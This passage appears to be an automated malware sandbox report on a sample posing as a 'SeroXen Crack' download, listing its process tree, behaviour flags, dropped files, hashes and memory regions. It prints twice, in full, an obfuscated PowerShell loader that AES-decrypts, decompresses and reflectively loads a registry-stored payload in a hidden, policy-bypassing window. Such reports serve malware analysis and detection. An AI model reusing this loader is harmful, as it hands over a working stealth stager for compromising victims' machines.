[System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij);$uYwHJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7tPhtRoBPpmbD4jKqCrROmZ5ihpYMWVokvpj2Ng/Pz8=');$uYwHJ = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uYwHJ, 0, $uYwHJ.Length);$uYwHJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uYwHJ);$XPhKE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MN4dM3v9612JtLqaveCMYg==');$XPhKE = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XPhKE, 0, $XPhKE.Length);$XPhKE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XPhKE);$muibj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('omE0gz6POPNwhNmUAnPGH44LhwPPACLWik/KT0dk5wsKXAxtKag+L5FPGR5kaqhlGUck2HtfdRNBwrYMOEAetiGgAox0exmtDDnAYLadphZBvi4OP8B8BNL4k5y/z1AEr7oudmgyCQifH3aXxa/gUUa4xjDsSD2YTOub7PHlsdmqG91RSBUMJH4vfT2zptSsj0OSscQsY4xVPZ8OjeRKbzP+BjF+Uue1s9LcXQdrizsUEKJN4dY28g0skU19VzfudgJv7Qa+SS93YCgWa9n+oNhygZquca/xgmF4Z+su7WedF+8tBgUKzviRtdEdVgLq/OMSlirCLjvFnSHC2y9K1oTEEyD1mQB836kwPebOOTmBNH6vdn2bEQQYiF/vc3FItt5vYPuWyJGzUen95KOQjYu7YoPz/dFXDUgmI65vnuw=');$muibj = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($muibj, 0, $muibj.Length);$muibj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($muibj);$DHHcr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tYnkG6mWBgWnZf6oIR3L5A==');$DHHcr = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DHHcr, 0, $DHHcr.Length);$DHHcr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DHHcr);$EQNXr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5fF2zWzAZ0BefyD1XaGcLw==');$EQNXr = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($EQNXr, 0, $EQNXr.Length);$EQNXr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($EQNXr);$mYQZS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3I7S8iNpJjrn0k9Lgckneg==');$mYQZS = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mYQZS, 0, $mYQZS.Length);$mYQZS = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mYQZS);$DbkFT = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v8BsdeVWD9I78LbbRhRFrA==');$DbkFT = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DbkFT, 0, $DbkFT.Length);$DbkFT = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DbkFT);$jgfOd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OEFFbXtp5W2U1hAoq0CpPw==');$jgfOd = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jgfOd, 0, $jgfOd.Length);$jgfOd = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jgfOd);$kveij0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1+Vym/OwDnC1v1RFNGQ5MA==');$kveij0 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij0, 0, $kveij0.Length);$kveij0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij0);$kveij1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1UB7UYof3ztQu3+ei666DQ==');$kveij1 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij1, 0, $kveij1.Length);$kveij1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij1);$kveij2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9594UuKb/Z+/WVWczIhxbQ==');$kveij2 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij2, 0, $kveij2.Length);$kveij2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij2);$kveij3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lxkDZyakK1CM3mmPkfi6OQ==');$kveij3 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij3, 0, $kveij3.Length);$kveij3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij3);$lkChZ.Dispose();$Elzpw1.Dispose();if (@(get-process -ea silentlycontinue $kveij3).count -gt 1) {exit};$ebqGe = [Microsoft.Win32.Registry]::$DbkFT.$mYQZS($kveij).$EQNXr($uYwHJ);$SceND=[string[]]$ebqGe.Split('\');$sNXpr=FJcTY(hufeg([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($SceND[1])));vUmWc $sNXpr (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$GiWwX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($SceND[0]);$Elzpw = New-Object System.Security.Cryptography.AesManaged;$Elzpw.Mode = [System.Security.Cryptography.CipherMode]::CBC;$Elzpw.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$Elzpw.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk=');$Elzpw.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA==');$wCTZr = $Elzpw.('rotpyrceDetaerC'[-1..-15] -join '')();$GiWwX = $wCTZr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GiWwX, 0, $GiWwX.Length);$wCTZr.Dispose();$Elzpw.Dispose();$KHdof = New-Object System.IO.MemoryStream(, $GiWwX);$mdDGq = New-Object System.IO.MemoryStream;$PZsap = New-Object System.IO.Compression.GZipStream($KHdof, [IO.Compression.CompressionMode]::$kveij1);$PZsap.$jgfOd($mdDGq);$PZsap.Dispose();$KHdof.Dispose();$mdDGq.Dispose();$GiWwX = $mdDGq.ToArray();$cyNnW = $muibj | IEX;$YHPse = $cyNnW::$kveij2($GiWwX);$aMqIy = $YHPse.EntryPoint;$aMqIy.$kveij0($null, (, [string[]] ($XPhKE)))3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{4d6255ed-e68e-49a7-a5f7-8bb0341ce780}4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\$sxr-powershell.exe"C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5312).WaitForExit();[System.Threading.Thread]::Sleep(5000); function hufeg($iDMxb){ $Elzpw=[System.Security.Cryptography.Aes]::Create(); $Elzpw.Mode=[System.Security.Cryptography.CipherMode]::CBC; $Elzpw.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $Elzpw.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk='); $Elzpw.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA=='); $wCTZr=$Elzpw.('rotpyrceDetaerC'[-1..-15] -join '')(); $YgtPo=$wCTZr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($iDMxb, 0, $iDMxb.Length); $wCTZr.Dispose(); $Elzpw.Dispose(); $YgtPo;}function FJcTY($iDMxb){ $KHdof=New-Object System.IO.MemoryStream(,$iDMxb); $mdDGq=New-Object System.IO.MemoryStream; $PZsap=New-Object System.IO.Compression.GZipStream($KHdof, [IO.Compression.CompressionMode]::Decompress); $PZsap.CopyTo($mdDGq); $PZsap.Dispose(); $KHdof.Dispose(); $mdDGq.Dispose(); $mdDGq.ToArray();}function vUmWc($iDMxb,$PbTpW){ $YHPse=[System.Reflection.Assembly]::Load([byte[]]$iDMxb); $aMqIy=$YHPse.EntryPoint; $aMqIy.Invoke($null, $PbTpW);}$Elzpw1 = New-Object System.Security.Cryptography.AesManaged;$Elzpw1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$Elzpw1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$Elzpw1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk=');$Elzpw1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA==');$lkChZ = $Elzpw1.('rotpyrceDetaerC'[-1..-15] -join '')();$kveij = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('skxuT638mXYXO82tnMu4Nw==');$kveij = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij, 0, $kveij.Length);$kveij = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij);$uYwHJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7tPhtRoBPpmbD4jKqCrROmZ5ihpYMWVokvpj2Ng/Pz8=');$uYwHJ = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uYwHJ, 0, $uYwHJ.Length);$uYwHJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uYwHJ);$XPhKE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MN4dM3v9612JtLqaveCMYg==');$XPhKE = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XPhKE, 0, $XPhKE.Length);$XPhKE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XPhKE);$muibj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('omE0gz6POPNwhNmUAnPGH44LhwPPACLWik/KT0dk5wsKXAxtKag+L5FPGR5kaqhlGUck2HtfdRNBwrYMOEAetiGgAox0exmtDDnAYLadphZBvi4OP8B8BNL4k5y/z1AEr7oudmgyCQifH3aXxa/gUUa4xjDsSD2YTOub7PHlsdmqG91RSBUMJH4vfT2zptSsj0OSscQsY4xVPZ8OjeRKbzP+BjF+Uue1s9LcXQdrizsUEKJN4dY28g0skU19VzfudgJv7Qa+SS93YCgWa9n+oNhygZquca/xgmF4Z+su7WedF+8tBgUKzviRtdEdVgLq/OMSlirCLjvFnSHC2y9K1oTEEyD1mQB836kwPebOOTmBNH6vdn2bEQQYiF/vc3FItt5vYPuWyJGzUen95KOQjYu7YoPz/dFXDUgmI65vnuw=');$muibj = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($muibj, 0, $muibj.Length);$muibj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($muibj);$DHHcr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tYnkG6mWBgWnZf6oIR3L5A==');$DHHcr = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DHHcr, 0, $DHHcr.Length);$DHHcr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DHHcr);$EQNXr = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5fF2zWzAZ0BefyD1XaGcLw==');$EQNXr = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($EQNXr, 0, $EQNXr.Length);$EQNXr = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($EQNXr);$mYQZS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3I7S8iNpJjrn0k9Lgckneg==');$mYQZS = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mYQZS, 0, $mYQZS.Length);$mYQZS = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mYQZS);$DbkFT = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('v8BsdeVWD9I78LbbRhRFrA==');$DbkFT = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DbkFT, 0, $DbkFT.Length);$DbkFT = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DbkFT);$jgfOd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('OEFFbXtp5W2U1hAoq0CpPw==');$jgfOd = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jgfOd, 0, $jgfOd.Length);$jgfOd = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jgfOd);$kveij0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1+Vym/OwDnC1v1RFNGQ5MA==');$kveij0 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij0, 0, $kveij0.Length);$kveij0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij0);$kveij1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1UB7UYof3ztQu3+ei666DQ==');$kveij1 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij1, 0, $kveij1.Length);$kveij1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij1);$kveij2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9594UuKb/Z+/WVWczIhxbQ==');$kveij2 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij2, 0, $kveij2.Length);$kveij2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij2);$kveij3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lxkDZyakK1CM3mmPkfi6OQ==');$kveij3 = $lkChZ.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($kveij3, 0, $kveij3.Length);$kveij3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($kveij3);$lkChZ.Dispose();$Elzpw1.Dispose();if (@(get-process -ea silentlycontinue $kveij3).count -gt 1) {exit};$ebqGe = [Microsoft.Win32.Registry]::$DbkFT.$mYQZS($kveij).$EQNXr($uYwHJ);$SceND=[string[]]$ebqGe.Split('\');$sNXpr=FJcTY(hufeg([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($SceND[1])));vUmWc $sNXpr (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$GiWwX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($SceND[0]);$Elzpw = New-Object System.Security.Cryptography.AesManaged;$Elzpw.Mode = [System.Security.Cryptography.CipherMode]::CBC;$Elzpw.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$Elzpw.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ScFxiXv+iEo0UMCuEp0Dj6ldTafwKIFrpQdT06sepfk=');$Elzpw.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x90xMD7ECTiuD6SgY+FhCA==');$wCTZr = $Elzpw.('rotpyrceDetaerC'[-1..-15] -join '')();$GiWwX = $wCTZr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GiWwX, 0, $GiWwX.Length);$wCTZr.Dispose();$Elzpw.Dispose();$KHdof = New-Object System.IO.MemoryStream(, $GiWwX);$mdDGq = New-Object System.IO.MemoryStream;$PZsap = New-Object System.IO.Compression.GZipStream($KHdof, [IO.Compression.CompressionMode]::$kveij1);$PZsap.$jgfOd($mdDGq);$PZsap.Dispose();$KHdof.Dispose();$mdDGq.Dispose();$GiWwX = $mdDGq.ToArray();$cyNnW = $muibj | IEX;$YHPse = $cyNnW::$kveij2($GiWwX);$aMqIy = $YHPse.EntryPoint;$aMqIy.$kveij0($null, (, [string[]] ($XPhKE)))4⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5f61fa5143fe872d1d8f1e9f8dc6544f9
SHA1df44bab94d7388fb38c63085ec4db80cfc5eb009
SHA256284a24b5b40860240db00ef3ae6a33c9fa8349ab5490a634e27b2c6e9a191c64
SHA512971000784a6518bb39c5cf043292c7ab659162275470f5f6b632ea91a6bcae83bc80517ceb983dd5abfe8fb4e157344cb65c27e609a879eec00b33c5fad563a6
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD587f7abeb82600e1e640b843ad50fe0a1
SHA1045bbada3f23fc59941bf7d0210fb160cb78ae87
SHA256b35d6906050d90a81d23646f86c20a8f5d42f058ffc6436fb0a2b8bd71ee1262
SHA512ea8e7f24ab823ad710ce079c86c40aa957353a00d2775732c23e31be88a10d212e974c4691279aa86016c4660f5795febf739a15207833df6ed964a9ed99d618
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
2KB
MD5278ce964abf39488d6a54108a888eedd
SHA109e0678b176f79f304d2cb7d294ccf2d12c57839
SHA256575ab498c98667e82f4aefd1ba5f3084458fd26685495584f230670b1c3d31d0
SHA512291baf3a5380bf3e16cd8b3aeda24a7baa63e125e520bc4c6ffe4ebe4d14261612e2ec2069a2fd82c00207d0022f107f47492f985d5babb58730fb9d4604b0bf
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent StateFilesize
111B
MD5285252a2f6327d41eab203dc2f402c67
SHA1acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA2565dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA51211ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD59ed2a50c4f0558b310d51a5249d6e12b
SHA13a009abeea1793a11be94c30f9ac46f5c2911ca4
SHA256296784680da57374600d359150495750a097e87ff0b3a7b183bc7c547ce4b7b9
SHA51287cd214e78ad3882d766093a2e20c2940c81b224fb4c289d833a1b1ca19dc0f18295ab08de0c6b2cdc00c64fa8e117033ba4f8b9f4d802d123c320e062490faa
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
5KB
MD513f945aa45b39a23e4110b29c104d90a
SHA11408c0248fbac082d087e8b286b23db174e1f1ee
SHA2568f08baadfde94fb35a9a150801de6704a39bef6948d7f642ccb3fd14fe8aa5a9
SHA512ecc1fe26f2a9237190e6cdd65c24e3138eade9b9899a045809895d6f14c7b0ffb37a32e7be9fcb5b7bc84880a305c99fd9b86a45d8dce6cc1829aebffe9404fe
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD598c5a5a7ceb88dcb3620b0c9901d84d8
SHA1b4a2176c857769d1ea18f170a004865486cb01ae
SHA256227880a408963d3ceb6b387ad673265390190162b0ac6beda9276dc172505253
SHA512f1847731a7dc3b3876363a4f2e385cdc01f22ea3fd2d75e42b0ffd0ed98c05f18a4a50f4c38d0a7d58ce1c4bd8ca38e78768787101a106927e50816cd522c34d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD5206702161f94c5cd39fadd03f4014d98
SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
11KB
MD5d7bff509d2fdd98f62e6c04f3e8053ea
SHA133ff0d5ff444d908a8e3ca2f1aa6ca693c053ca2
SHA256a9d6ba6025e43e044d2ca67dac21802bb3ed42d328124d274fa935bda5ba5d9f
SHA51270c53924662c5df6d4d07cc21c4b10a79f54d63441878f9c4995c56037e8e51dfd88e92af07a82ab3e70f90ca0811bbf7cd923114523358fa2dadea9d969b374
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
11KB
MD5426bb78b333edba5f81e9c7884fd296f
SHA1bf43def9256cc2197c184d7c7aecad12443ecce1
SHA25655a279e4caea72724b01af7433916a68aa2643e302fac9994887558edf3dda39
SHA5129af3ce8392f57740ca270c7bf9e4d865d2cdb068880c08079681798c027017a57e3463a9f63e7d00f7d421e1da6d542204afc33a3a83def8d46bdfd980881360
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mlinf0v1.21h.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\Downloads\SeroXen Crack.rarFilesize
8.2MB
MD5a28bbc6271992ffc4dbd706fca6034fe
SHA16a8f5bbce1d17fd37f7dfb59fffa1c16c3fccd17
SHA256306d942083d3df861ab01b8ea413c8059df0e9ef95b73ed0dddfc8be5a8567e7
SHA51222298e426eed578fa73585461033e3d1a597f7e93640d033e3d03d449974c4f25a70da463c0c69698faa1d546d4e75cb13312ac17c0d9ae51c69e32a0d20c213
-
C:\Users\Admin\Downloads\SeroXen Crack\SeroXen Crack\SeroXen-install.batFilesize
12.6MB
MD5898f49c739026123b6a3811fa31abe70
SHA131ff6036b40d70d21cb1c4c0163cba0d4c720551
SHA25678b0a14a882dec287c0dc5a294ad02a4a5aaa0d130839d49f282c7d61069471f
SHA512a9aa2bf15db84361f315156ee6386cac49c14c2449a72e2f50b2e0b8d100781019c246c03a38a37d5dfc71a7c1c5451457faba074d1a875cab615ecb8d3e453d
-
C:\Users\Admin\Downloads\SeroXen Crack\SeroXen Crack\SeroXen-install.bat.exeFilesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
C:\Windows\$sxr-cmd.exeFilesize
283KB
MD58a2122e8162dbef04694b9c3e0b6cdee
SHA1f1efb0fddc156e4c61c5f78a54700e4e7984d55d
SHA256b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450
SHA51299e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397
-
C:\Windows\$sxr-mshta.exeFilesize
14KB
MD50b4340ed812dc82ce636c00fa5c9bef2
SHA151c97ebe601ef079b16bcd87af827b0be5283d96
SHA256dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895
SHA512d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045
-
\??\pipe\LOCAL\crashpad_4444_ILQZCDBFWSARKHWPMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/5240-282-0x00000267C3710000-0x00000267C3768000-memory.dmpFilesize
352KB
-
memory/5240-273-0x00000267A84E0000-0x00000267A8504000-memory.dmpFilesize
144KB
-
memory/5240-278-0x00000267C2BB0000-0x00000267C3600000-memory.dmpFilesize
10.3MB
-
memory/5240-280-0x00000267C3600000-0x00000267C36A6000-memory.dmpFilesize
664KB
-
memory/5240-277-0x00007FFA11090000-0x00007FFA1114E000-memory.dmpFilesize
760KB
-
memory/5240-281-0x00000267C36B0000-0x00000267C3706000-memory.dmpFilesize
344KB
-
memory/5240-283-0x00000267A8510000-0x00000267A8532000-memory.dmpFilesize
136KB
-
memory/5240-286-0x00000267A9EE0000-0x00000267A9EEA000-memory.dmpFilesize
40KB
-
memory/5240-284-0x00007FFA12F10000-0x00007FFA13105000-memory.dmpFilesize
2.0MB
-
memory/5240-263-0x00000267AA4D0000-0x00000267AA4F2000-memory.dmpFilesize
136KB
-
memory/5240-276-0x00007FFA12F10000-0x00007FFA13105000-memory.dmpFilesize
2.0MB
-
memory/5312-327-0x000001123B790000-0x000001123B842000-memory.dmpFilesize
712KB
-
memory/5312-326-0x000001123B350000-0x000001123B78E000-memory.dmpFilesize
4.2MB
-
memory/5312-353-0x0000011233500000-0x00000112336C2000-memory.dmpFilesize
1.8MB
-
memory/5312-352-0x0000011233190000-0x0000011233242000-memory.dmpFilesize
712KB
-
memory/5312-322-0x00007FFA12F10000-0x00007FFA13105000-memory.dmpFilesize
2.0MB
-
memory/5312-323-0x00007FFA11090000-0x00007FFA1114E000-memory.dmpFilesize
760KB
-
memory/5312-351-0x0000011233080000-0x00000112330D0000-memory.dmpFilesize
320KB
-
memory/5312-325-0x000001123AB80000-0x000001123B34A000-memory.dmpFilesize
7.8MB
-
memory/5312-324-0x0000011232120000-0x00000112326A4000-memory.dmpFilesize
5.5MB
-
memory/5312-329-0x00007FFA12F10000-0x00007FFA13105000-memory.dmpFilesize
2.0MB
-
memory/5312-328-0x0000011231DF0000-0x0000011231E12000-memory.dmpFilesize
136KB
-
memory/5952-288-0x0000000140000000-0x0000000140004000-memory.dmpFilesize
16KB
-
memory/5952-287-0x0000000140000000-0x0000000140004000-memory.dmpFilesize
16KB
-
memory/5996-290-0x0000000000400000-0x0000000000406000-memory.dmpFilesize
24KB
-
memory/5996-289-0x0000000000400000-0x0000000000406000-memory.dmpFilesize
24KB